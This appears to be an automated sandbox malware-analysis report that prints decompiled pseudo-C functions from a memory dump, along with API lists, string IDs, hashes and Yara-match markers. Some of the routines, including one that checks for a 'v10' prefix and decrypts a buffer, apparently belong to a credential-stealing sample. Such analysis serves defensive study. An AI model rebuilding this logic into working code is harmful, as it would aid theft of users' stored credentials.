                                                                    • Instruction ID: 10560db6e106e76c707617d249395efee4377079e00630e1da913ad824ff6f7d
                                                                    • Opcode Fuzzy Hash: feb0dd7a4c08f04702d763bdba0a441384657e9fdaf4ccebeb5b21a9fe20b4f1
                                                                    • Instruction Fuzzy Hash: C041D032D00219AFDF14EFAAE881ADEB7B5AF44310F50853AF220B72D1CB385945CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E874 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 57%
                                                                    			E0040E874(char* __ebx, intOrPtr __ecx, long __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				intOrPtr _t58;
				long _t60;
				void* _t64;
				char* _t68;
				void* _t70;
				intOrPtr _t74;
				int _t84;
				void* _t86;

				_t81 = __edi;
				_t68 = __ebx;
				_push(0x74);
				E0042083E(E00433A78, __ebx, __edi, __esi);
				_t48 =  *((intOrPtr*)(_t86 + 8));
				 *(_t86 - 0x3c) =  *(_t86 - 0x3c) & 0x00000000;
				 *((intOrPtr*)(_t86 - 0x34)) = __ecx;
				_t70 = 3;
				_t83 = __edx;
				 *(_t86 - 0x30) = __edx;
				 *((intOrPtr*)(_t86 - 0x38)) = _t48;
				if(_t48 < _t70) {
					L10:
					E004042A9(_t68, E0040E80D(_t48,  *(_t86 - 0x30), 0));
				} else {
					_t81 = 0x43ca74;
					asm("repe cmpsb");
					if(0 != 0) {
						goto L10;
					} else {
						if( *((intOrPtr*)(_t86 + 0xc)) == 0 ||  *((intOrPtr*)(_t86 - 0x34)) == 0) {
							 *((intOrPtr*)(_t68 + 0x14)) = 0xf;
							 *((intOrPtr*)(_t68 + 0x10)) = 0;
							 *_t68 = 0;
							goto L8;
						} else {
							_t84 = 0x40;
							E00426300(_t86 - 0x80, 0, _t84);
							_t74 =  *((intOrPtr*)(_t86 - 0x38));
							_t58 =  *(_t86 - 0x30) + 3;
							 *((intOrPtr*)(_t86 - 0x78)) = _t58;
							 *((intOrPtr*)(_t86 - 0x68)) = _t74 + _t58 - 0x13;
							_t60 = _t74 - 0x1f;
							 *(_t86 - 0x80) = _t84;
							 *((intOrPtr*)(_t86 - 0x7c)) = 1;
							 *((intOrPtr*)(_t86 - 0x74)) = 0xc;
							 *((intOrPtr*)(_t86 - 0x64)) = 0x10;
							 *(_t86 - 0x30) = _t60;
							_t81 = LocalAlloc(_t84, _t60);
							_t83 = 0;
							if(_t81 == 0) {
								L7:
								 *((intOrPtr*)(_t68 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t68 + 0x10)) = _t83;
								 *_t68 = 0;
								L8:
								E00404331(_t68, "NULL");
							} else {
								_t64 =  *0x446470( *((intOrPtr*)(_t86 - 0x34)),  *((intOrPtr*)(_t86 - 0x74)) +  *((intOrPtr*)(_t86 - 0x78)),  *(_t86 - 0x30), _t86 - 0x80, 0, 0, _t81,  *(_t86 - 0x30), _t86 - 0x30, 0);
								_t95 = _t64;
								if(_t64 < 0) {
									goto L7;
								} else {
									 *(_t86 - 0x1c) =  *(_t86 - 0x1c) & 0x00000000;
									_push(0xf);
									 *((intOrPtr*)(_t86 - 0x18)) = 0;
									 *((char*)(_t86 - 0x2c)) = 0;
									E00404396(_t86 - 0x2c, _t95, _t81,  *(_t86 - 0x30));
									 *(_t86 - 4) =  *(_t86 - 4) & 0x00000000;
									 *(__ebx + 0x10) =  *(__ebx + 0x10) & 0x00000000;
									 *((intOrPtr*)(__ebx + 0x14)) = 0;
									_t83 = _t86 - 0x2c;
									_t81 = __ebx;
									 *__ebx = 0;
									E004042ED(__ebx, _t86 - 0x2c);
									E00404354(_t83, 1, 0);
								}
							}
						}
					}
				}
				return E00420888(_t68, _t81, _t83);
			}












                                                                    0x0040e874
                                                                    0x0040e874
                                                                    0x0040e874
                                                                    0x0040e87b
                                                                    0x0040e880
                                                                    0x0040e883
                                                                    0x0040e889
                                                                    0x0040e88c
                                                                    0x0040e88d
                                                                    0x0040e88f
                                                                    0x0040e892
                                                                    0x0040e897
                                                                    0x0040e9a0
                                                                    0x0040e9ab
                                                                    0x0040e89d
                                                                    0x0040e89d
                                                                    0x0040e8a4
                                                                    0x0040e8a6
                                                                    0x00000000
                                                                    0x0040e8ac
                                                                    0x0040e8b1
                                                                    0x0040e992
                                                                    0x0040e999
                                                                    0x0040e99c
                                                                    0x00000000
                                                                    0x0040e8c0
                                                                    0x0040e8c2
                                                                    0x0040e8c9
                                                                    0x0040e8d1
                                                                    0x0040e8d4
                                                                    0x0040e8d7
                                                                    0x0040e8e1
                                                                    0x0040e8e4
                                                                    0x0040e8e9
                                                                    0x0040e8ec
                                                                    0x0040e8f3
                                                                    0x0040e8fa
                                                                    0x0040e901
                                                                    0x0040e90a
                                                                    0x0040e90c
                                                                    0x0040e910
                                                                    0x0040e977
                                                                    0x0040e977
                                                                    0x0040e97e
                                                                    0x0040e981
                                                                    0x0040e984
                                                                    0x0040e98b
                                                                    0x0040e912
                                                                    0x0040e92e
                                                                    0x0040e934
                                                                    0x0040e936
                                                                    0x00000000
                                                                    0x0040e938
                                                                    0x0040e938
                                                                    0x0040e93c
                                                                    0x0040e946
                                                                    0x0040e949
                                                                    0x0040e94d
                                                                    0x0040e952
                                                                    0x0040e956
                                                                    0x0040e95a
                                                                    0x0040e95d
                                                                    0x0040e960
                                                                    0x0040e962
                                                                    0x0040e965
                                                                    0x0040e970
                                                                    0x0040e970
                                                                    0x0040e936
                                                                    0x0040e910
                                                                    0x0040e8b1
                                                                    0x0040e8a6
                                                                    0x0040e9b7

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040E87B
                                                                    • _memset.LIBCMT ref: 0040E8C9
                                                                    • LocalAlloc.KERNEL32 ref: 0040E904
                                                                      • Part of subcall function 004042ED: _memmove.LIBCMT ref: 00404309
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _memmove$AllocH_prolog3_Local_memset
                                                                    • String ID: NULL$v10
                                                                    • API String ID: 1135815740-1391045996
                                                                    • Opcode ID: 58432bd0f04ea3043ef38e1d9cd93902280b96f67a1fac45a6b3b9fe371299b3
                                                                    • Instruction ID: a1f7995ef2a12b539f63f29eb38db067053ea713943fcdef92890d6481b1d1a8
                                                                    • Opcode Fuzzy Hash: 58432bd0f04ea3043ef38e1d9cd93902280b96f67a1fac45a6b3b9fe371299b3
                                                                    • Instruction Fuzzy Hash: 62415CB1D01228ABDF10DFA6D885BAEBBB9BF44705F10442FF501AB282C7799514CB99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040A9FD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			E0040A9FD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t43;
				intOrPtr _t46;
				intOrPtr _t53;
				void* _t57;
				intOrPtr _t61;
				void* _t65;
				void* _t73;
				void* _t82;
				void* _t83;
				void* _t87;

				_t87 = __eflags;
				_t73 = __edx;
				_t65 = __ecx;
				_push(0x4c);
				E0042083E(E004342C4, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t82 - 0x50)) =  *((intOrPtr*)(_t82 + 0x40));
				 *((intOrPtr*)(_t82 - 4)) = 0;
				 *((intOrPtr*)(_t82 - 0x18)) = 0xf;
				 *((intOrPtr*)(_t82 - 0x1c)) = 0;
				 *((char*)(_t82 - 0x2c)) = 0;
				_t84 = _t83 - 0x1c;
				 *((intOrPtr*)(_t82 - 0x58)) = _t83 - 0x1c;
				 *((char*)(_t82 - 4)) = 2;
				 *((intOrPtr*)(_t82 - 0x4c)) = 0;
				 *((intOrPtr*)(_t82 - 0x54)) = 0;
				E00404778(_t84, _t82 + 0x24);
				_push(_t82 - 0x48);
				_t43 = E0040A1C1(_t65, _t87);
				 *((char*)(_t82 - 4)) = 3;
				E004042ED(_t82 - 0x2c, _t43);
				_t66 = _t82 - 0x48;
				 *((char*)(_t82 - 4)) = 2;
				E00404354(_t82 - 0x48, 1, 0);
				_t46 =  *((intOrPtr*)(_t82 - 0x2c));
				if( *((intOrPtr*)(_t82 - 0x18)) < 0x10) {
					_t46 = _t82 - 0x2c;
				}
				_t81 = "ERROR";
				_push("ERROR");
				_push(_t46);
				if( *0x446458() == 0) {
					_t67 = 0x4442dc;
					goto L12;
				} else {
					_t53 =  *((intOrPtr*)(_t82 + 8));
					if( *((intOrPtr*)(_t82 + 0x1c)) < 0x10) {
						_t53 = _t82 + 8;
					}
					if(E0040C06B(0, _t66, _t82 - 0x2c, _t53,  *((intOrPtr*)(_t82 + 0x18))) != 0xffffffff) {
						E0040453E(_t82 - 0x2c, 0, _t56 + 6);
						_t61 =  *((intOrPtr*)(_t82 - 0x2c));
						if( *((intOrPtr*)(_t82 - 0x18)) < 0x10) {
							_t61 = _t82 - 0x2c;
						}
						 *((intOrPtr*)(_t82 - 0x4c)) = E0041E87C(0, _t73, 1, _t61,  *((intOrPtr*)(_t82 - 0x50)), _t82 - 0x54);
					}
					_t57 =  *0x446320( *((intOrPtr*)(_t82 - 0x4c)));
					_t67 = 0x4442dc;
					if(_t57 < 1) {
						L12:
						E00404396(_t67, __eflags, _t81, 5);
					} else {
						E00404331(0x4442dc,  *((intOrPtr*)(_t82 - 0x4c)));
					}
				}
				E00404354(_t82 - 0x2c, 1, 0);
				E00404354(_t82 + 8, 1, 0);
				E00404354(_t82 + 0x24, 1, 0);
				return E00420888(0, 1, _t81);
			}













                                                                    0x0040a9fd
                                                                    0x0040a9fd
                                                                    0x0040a9fd
                                                                    0x0040a9fd
                                                                    0x0040aa04
                                                                    0x0040aa0c
                                                                    0x0040aa11
                                                                    0x0040aa14
                                                                    0x0040aa1b
                                                                    0x0040aa1e
                                                                    0x0040aa21
                                                                    0x0040aa29
                                                                    0x0040aa2c
                                                                    0x0040aa31
                                                                    0x0040aa34
                                                                    0x0040aa37
                                                                    0x0040aa3f
                                                                    0x0040aa40
                                                                    0x0040aa4d
                                                                    0x0040aa51
                                                                    0x0040aa5b
                                                                    0x0040aa5e
                                                                    0x0040aa62
                                                                    0x0040aa6b
                                                                    0x0040aa6e
                                                                    0x0040aa70
                                                                    0x0040aa70
                                                                    0x0040aa73
                                                                    0x0040aa78
                                                                    0x0040aa79
                                                                    0x0040aa82
                                                                    0x0040aaec
                                                                    0x00000000
                                                                    0x0040aa84
                                                                    0x0040aa88
                                                                    0x0040aa8b
                                                                    0x0040aa8d
                                                                    0x0040aa8d
                                                                    0x0040aaa2
                                                                    0x0040aaac
                                                                    0x0040aab5
                                                                    0x0040aab8
                                                                    0x0040aaba
                                                                    0x0040aaba
                                                                    0x0040aacd
                                                                    0x0040aacd
                                                                    0x0040aad3
                                                                    0x0040aad9
                                                                    0x0040aae0
                                                                    0x0040aaf1
                                                                    0x0040aaf4
                                                                    0x0040aae2
                                                                    0x0040aae5
                                                                    0x0040aae5
                                                                    0x0040aae0
                                                                    0x0040aafe
                                                                    0x0040ab08
                                                                    0x0040ab12
                                                                    0x0040ab1c

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040AA04
                                                                      • Part of subcall function 004042ED: _memmove.LIBCMT ref: 00404309
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    • StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040AA7A
                                                                    • _strtok_s.LIBCMT ref: 0040AAC5
                                                                    • lstrlen.KERNEL32(?,?,?,00000010), ref: 0040AAD3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _memmove$H_prolog3__strtok_slstrlen
                                                                    • String ID: ERROR
                                                                    • API String ID: 998862610-2861137601
                                                                    • Opcode ID: d521e578979a6c6202c0192e6a5a089e9fe64a6157c5fd6872e8fe02ae282fe7
                                                                    • Instruction ID: f66f733ea0f3a8ce8df2af2bb30762f59b533872b57ab822dd5dd657bc18bb23
                                                                    • Opcode Fuzzy Hash: d521e578979a6c6202c0192e6a5a089e9fe64a6157c5fd6872e8fe02ae282fe7
                                                                    • Instruction Fuzzy Hash: 9C3150B1D002089BDF14EFEAC8859DEBBB8AF59304F40812EF911B7181D7385944CFA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040AB1D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E0040AB1D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t35;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t55;
				void* _t69;
				void* _t70;
				intOrPtr _t71;

				_t66 = __esi;
				_t62 = __edi;
				_push(0x40);
				E0042083E(E0043427F, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t69 - 4)) = 0;
				 *((intOrPtr*)(_t69 - 0x18)) = 0xf;
				 *((intOrPtr*)(_t69 - 0x1c)) = 0;
				 *((char*)(_t69 - 0x2c)) = 0;
				 *((char*)(_t69 - 4)) = 2;
				_t74 =  *((intOrPtr*)(_t69 + 0x1c)) - 0x10;
				_t50 =  *((intOrPtr*)(_t69 + 8));
				if( *((intOrPtr*)(_t69 + 0x1c)) < 0x10) {
					_t50 = _t69 + 8;
				}
				 *0x446458(E0040D694(_t50, _t62, _t66), "https");
				_t71 = _t70 - 0x1c;
				 *((intOrPtr*)(_t69 - 0x4c)) = _t71;
				_push(_t69 + 8);
				E0040C1B7(_t50, _t69 + 0x24, _t66, _t74);
				_t55 = _t71;
				_push(_t69 - 0x48);
				_t35 = E0040A1C1(_t55, _t74);
				 *((char*)(_t69 - 4)) = 3;
				E004042ED(_t69 - 0x2c, _t35);
				 *((char*)(_t69 - 4)) = 2;
				E00404354(_t69 - 0x48, 1, 0);
				_t38 =  *((intOrPtr*)(_t69 - 0x2c));
				if( *((intOrPtr*)(_t69 - 0x18)) < 0x10) {
					_t38 = _t69 - 0x2c;
				}
				_t68 = "ERROR";
				_push("ERROR");
				_push(_t38);
				if( *0x446458() == 0) {
					E00404396(0x4442dc, __eflags, _t68, 5);
				} else {
					E0040440A(0x4442dc, _t69 + 8, 0, 0xffffffff);
					_t77 =  *((intOrPtr*)(_t69 - 0x18)) - 0x10;
					_t47 =  *((intOrPtr*)(_t69 - 0x2c));
					if( *((intOrPtr*)(_t69 - 0x18)) < 0x10) {
						_t47 = _t69 - 0x2c;
					}
					E004085DE(1, _t77, _t47);
				}
				E00404354(_t69 - 0x2c, 1, 0);
				E00404354(_t69 + 8, 1, 0);
				E00404354(_t69 + 0x24, 1, 0);
				return E00420888(1, 0, _t68);
			}











                                                                    0x0040ab1d
                                                                    0x0040ab1d
                                                                    0x0040ab1d
                                                                    0x0040ab24
                                                                    0x0040ab2b
                                                                    0x0040ab2e
                                                                    0x0040ab35
                                                                    0x0040ab38
                                                                    0x0040ab3b
                                                                    0x0040ab3f
                                                                    0x0040ab43
                                                                    0x0040ab46
                                                                    0x0040ab48
                                                                    0x0040ab48
                                                                    0x0040ab56
                                                                    0x0040ab5c
                                                                    0x0040ab64
                                                                    0x0040ab67
                                                                    0x0040ab6c
                                                                    0x0040ab72
                                                                    0x0040ab76
                                                                    0x0040ab77
                                                                    0x0040ab84
                                                                    0x0040ab88
                                                                    0x0040ab97
                                                                    0x0040ab9b
                                                                    0x0040aba4
                                                                    0x0040aba7
                                                                    0x0040aba9
                                                                    0x0040aba9
                                                                    0x0040abac
                                                                    0x0040abb1
                                                                    0x0040abb2
                                                                    0x0040abc0
                                                                    0x0040abe6
                                                                    0x0040abc2
                                                                    0x0040abc9
                                                                    0x0040abce
                                                                    0x0040abd2
                                                                    0x0040abd5
                                                                    0x0040abd7
                                                                    0x0040abd7
                                                                    0x0040abdb
                                                                    0x0040abe0
                                                                    0x0040abf0
                                                                    0x0040abfa
                                                                    0x0040ac04
                                                                    0x0040ac0e

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040AB24
                                                                    • StrCmpCA.SHLWAPI(00000000,https,00000040,0040BA7E,004442DC), ref: 0040AB56
                                                                    • StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040ABB3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: H_prolog3_
                                                                    • String ID: ERROR$https
                                                                    • API String ID: 2427045233-230934144
                                                                    • Opcode ID: f45075964407f3bf01a0f3c34d58ae4fbd20835a7e01ca891d84aaca0ed77c92
                                                                    • Instruction ID: 90dd9704dbd00fac3d89226a42bd312acb49792eb78a2f1931c1aff0bf52622d
                                                                    • Opcode Fuzzy Hash: f45075964407f3bf01a0f3c34d58ae4fbd20835a7e01ca891d84aaca0ed77c92
                                                                    • Instruction Fuzzy Hash: E5216672900248AEDF04EBE9C8469DF7B789F55354F00446FFA15771C2DA386A44CBA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404799 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00404799(void* __eax, signed int __ecx, intOrPtr* __esi, intOrPtr* _a4, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr _t17;
				void* _t18;
				intOrPtr _t19;
				intOrPtr* _t22;
				intOrPtr* _t27;
				void* _t28;
				signed int _t29;
				intOrPtr* _t33;
				intOrPtr _t35;
				intOrPtr* _t37;
				void* _t38;

				_t37 = __esi;
				_t29 = __ecx;
				_t28 = __eax;
				_t17 =  *((intOrPtr*)(_a4 + 0x10));
				if(_t17 < _a8) {
					_t17 = E0041CFED("invalid string position");
				}
				_t18 = _t17 - _a8;
				if(_t18 < _t28) {
					_t28 = _t18;
				}
				_t19 =  *((intOrPtr*)(_t37 + 0x10));
				if((_t29 | 0xffffffff) - _t19 <= _t28) {
					_t19 = E0041CFA0("string too long");
				}
				if(_t28 != 0) {
					_t35 = _t19 + _t28;
					if(E004044A3(_t28, _t37, _t35, _t38, _t35, 0) != 0) {
						_t22 = _a4;
						if( *((intOrPtr*)(_t22 + 0x14)) >= 0x10) {
							_t22 =  *_t22;
						}
						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
							_t33 = _t37;
						} else {
							_t33 =  *_t37;
						}
						E00420090( *((intOrPtr*)(_t37 + 0x10)) + _t33, _t22 + _a8, _t28);
						 *((intOrPtr*)(_t37 + 0x10)) = _t35;
						if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
							_t27 = _t37;
						} else {
							_t27 =  *_t37;
						}
						 *((char*)(_t27 + _t35)) = 0;
					}
				}
				return _t37;
			}

















                                                                    0x00404799
                                                                    0x00404799
                                                                    0x0040479d
                                                                    0x004047a2
                                                                    0x004047a8
                                                                    0x004047af
                                                                    0x004047af
                                                                    0x004047b4
                                                                    0x004047b9
                                                                    0x004047bb
                                                                    0x004047bb
                                                                    0x004047bd
                                                                    0x004047c7
                                                                    0x004047ce
                                                                    0x004047ce
                                                                    0x004047d5
                                                                    0x004047d8
                                                                    0x004047e7
                                                                    0x004047e9
                                                                    0x004047f0
                                                                    0x004047f2
                                                                    0x004047f2
                                                                    0x004047f8
                                                                    0x004047fe
                                                                    0x004047fa
                                                                    0x004047fa
                                                                    0x004047fa
                                                                    0x0040480b
                                                                    0x00404817
                                                                    0x0040481a
                                                                    0x00404820
                                                                    0x0040481c
                                                                    0x0040481c
                                                                    0x0040481c
                                                                    0x00404822
                                                                    0x00404822
                                                                    0x00404826
                                                                    0x0040482b

                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004047AF
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004047CE
                                                                    • _memmove.LIBCMT ref: 0040480B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                    • String ID: invalid string position$string too long
                                                                    • API String ID: 3404309857-4289949731
                                                                    • Opcode ID: b0dccce2164e6abae88e0659682b1c97b8ba73b75cd5a73ca4091544359ef5fa
                                                                    • Instruction ID: 06192025c113f57125c650266fd048f92f2f53487dcd0e52fcfd683f5553d66c
                                                                    • Opcode Fuzzy Hash: b0dccce2164e6abae88e0659682b1c97b8ba73b75cd5a73ca4091544359ef5fa
                                                                    • Instruction Fuzzy Hash: 2F1194B13002409FDB24EE2CD9C1A16B3E5EF86714B10493EF652EB6D1D778E9408799
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00417C5A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00417C5A(signed int __ecx, void* __edi, intOrPtr* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				void* __ebx;
				intOrPtr _t11;
				intOrPtr _t14;
				intOrPtr* _t15;
				intOrPtr* _t21;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;
				intOrPtr* _t29;
				void* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t37 = __ebp;
				_t36 = __esi;
				_t35 = __edi;
				_t25 = __ecx;
				_t23 =  *((intOrPtr*)(__esi + 0x10));
				if(_t23 < __edi) {
					E0041CFED("invalid string position");
				}
				_t11 = _a4;
				if((_t25 | 0xffffffff) - _t23 <= _t11) {
					_t11 = E0041CFA0("string too long");
				}
				if(_t11 != 0) {
					_t24 = _t23 + _t11;
					if(E004044A3(_t24, _t36, _t35, _t37, _t24, 0) != 0) {
						_t14 =  *((intOrPtr*)(_t36 + 0x14));
						if(_t14 < 0x10) {
							_t29 = _t36;
						} else {
							_t29 =  *_t36;
						}
						if(_t14 < 0x10) {
							_t15 = _t36;
						} else {
							_t15 =  *_t36;
						}
						E0041DCF0(_t15 + _t35 + _a4, _t29 + _t35,  *((intOrPtr*)(_t36 + 0x10)) - _t35);
						E0040C185(_t36, _t35, _a8, _a4);
						 *((intOrPtr*)(_t36 + 0x10)) = _t24;
						if( *((intOrPtr*)(_t36 + 0x14)) < 0x10) {
							_t21 = _t36;
						} else {
							_t21 =  *_t36;
						}
						 *((char*)(_t21 + _t24)) = 0;
					}
				}
				return _t36;
			}















                                                                    0x00417c5a
                                                                    0x00417c5a
                                                                    0x00417c5a
                                                                    0x00417c5a
                                                                    0x00417c5b
                                                                    0x00417c60
                                                                    0x00417c67
                                                                    0x00417c67
                                                                    0x00417c6c
                                                                    0x00417c77
                                                                    0x00417c7e
                                                                    0x00417c7e
                                                                    0x00417c85
                                                                    0x00417c87
                                                                    0x00417c95
                                                                    0x00417c97
                                                                    0x00417c9d
                                                                    0x00417ca3
                                                                    0x00417c9f
                                                                    0x00417c9f
                                                                    0x00417c9f
                                                                    0x00417ca8
                                                                    0x00417cae
                                                                    0x00417caa
                                                                    0x00417caa
                                                                    0x00417caa
                                                                    0x00417cc0
                                                                    0x00417cd4
                                                                    0x00417cdd
                                                                    0x00417ce0
                                                                    0x00417ce6
                                                                    0x00417ce2
                                                                    0x00417ce2
                                                                    0x00417ce2
                                                                    0x00417ce8
                                                                    0x00417ce8
                                                                    0x00417c95
                                                                    0x00417cef

                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417C67
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00417C7E
                                                                    • _memmove.LIBCMT ref: 00417CC0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                    • String ID: invalid string position$string too long
                                                                    • API String ID: 3404309857-4289949731
                                                                    • Opcode ID: 8ac08005b56f26802e3a6449e88d96a40140e51abd020bb49937287e1b8d79a2
                                                                    • Instruction ID: 5d32071b40c850619f8de39f48f48a86f3dd8e3609f11ec63f8c4fba43319f1d
                                                                    • Opcode Fuzzy Hash: 8ac08005b56f26802e3a6449e88d96a40140e51abd020bb49937287e1b8d79a2
                                                                    • Instruction Fuzzy Hash: 3D11C67030820057D6249E2CCDD1A5FB7F6AB80700B24091EF092973C2EB68D88487DD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040E2EF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 22%
                                                                    			E0040E2EF(char* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				char* _t17;
				signed char _t19;
				char* _t26;
				intOrPtr _t28;

				_t17 = 0;
				if(_a4 == 0) {
					L3:
					_t19 =  *(_t26 + 0x10) &  *(_t26 + 0xc);
					if((_t19 & 0x00000004) == 0) {
						if((_t19 & 0x00000002) == 0) {
							_t28 = E0041D0E3();
							_a4 = "ios_base::eofbit set";
						} else {
							_t28 = E0041D0E3();
							_a4 = "ios_base::failbit set";
						}
					} else {
						_t28 = E0041D0E3();
						_a4 = "ios_base::badbit set";
					}
					_t26 =  &_v24;
					E0041DC00(_t26,  &_a4);
					_v12 = 1;
					_v8 = _t28;
					_v24 = 0x43f3d8;
					_push(0x440cc4);
					_t17 =  &_v24;
					goto L2;
				} else {
					_push(0);
					L2:
					_push(_t17);
					E0041FF86();
					goto L3;
				}
			}










                                                                    0x0040e2f5
                                                                    0x0040e2fc
                                                                    0x0040e305
                                                                    0x0040e308
                                                                    0x0040e310
                                                                    0x0040e345
                                                                    0x0040e35c
                                                                    0x0040e35e
                                                                    0x0040e347
                                                                    0x0040e34c
                                                                    0x0040e34e
                                                                    0x0040e34e
                                                                    0x0040e312
                                                                    0x0040e317
                                                                    0x0040e319
                                                                    0x0040e319
                                                                    0x0040e324
                                                                    0x0040e327
                                                                    0x0040e32c
                                                                    0x0040e32f
                                                                    0x0040e332
                                                                    0x0040e339
                                                                    0x0040e33e
                                                                    0x00000000
                                                                    0x0040e2fe
                                                                    0x0040e2fe
                                                                    0x0040e2ff
                                                                    0x0040e2ff
                                                                    0x0040e300
                                                                    0x00000000
                                                                    0x0040e300

                                                                    APIs
                                                                    • __CxxThrowException@8.LIBCMT ref: 0040E300
                                                                    • std::exception::exception.LIBCMT ref: 0040E327
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 3728558374-1866435925
                                                                    • Opcode ID: 7de800bcf879f97ebb41801f591740d754f2f675f7563ffbb9479eb7d4ae25c5
                                                                    • Instruction ID: ba445088deea3d3149b953072594bd5e8f0754741f753fd0473410ed9c71ae23
                                                                    • Opcode Fuzzy Hash: 7de800bcf879f97ebb41801f591740d754f2f675f7563ffbb9479eb7d4ae25c5
                                                                    • Instruction Fuzzy Hash: 7B01A7B0C04204AACB04EF55C5455EE7FB89E08348F24843BEC04AB242D778DA5BC7E9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D694 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38stringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 67%
                                                                    			E0040D694(char* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v72;
				intOrPtr _v124;
				char* _v128;
				char _v132;
				signed int _t11;
				int _t20;
				char* _t21;
				void* _t26;
				void* _t27;
